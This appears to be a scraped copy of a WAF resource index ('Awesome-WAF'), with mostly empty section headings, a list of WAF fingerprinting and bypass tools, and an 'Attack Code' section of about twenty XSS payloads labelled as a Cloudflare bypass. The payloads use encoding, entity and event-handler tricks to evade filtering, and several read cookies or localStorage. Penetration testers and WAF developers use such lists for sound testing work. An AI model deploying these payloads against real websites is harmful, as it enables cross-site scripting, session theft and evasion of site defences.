Web Application Firewall
Awesome-WAF - The Definitive Guide.

Fingerprinting

  • WhatWaf - Detect and bypass web application firewalls and protection systems
  • WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
  • IdentYwaf - A blind WAF detection tool which utilises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm.

Testing

Evasion

Blogs and Writeups

Much of the content mentioned above has been taken from the following excellent writeups.

Video Presentations

Presentations & Research Papers

Research Papers:

Presentations:

Attack Code

Cloudflare Bypass

<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<img ignored=() src=x onerror=prompt(1)>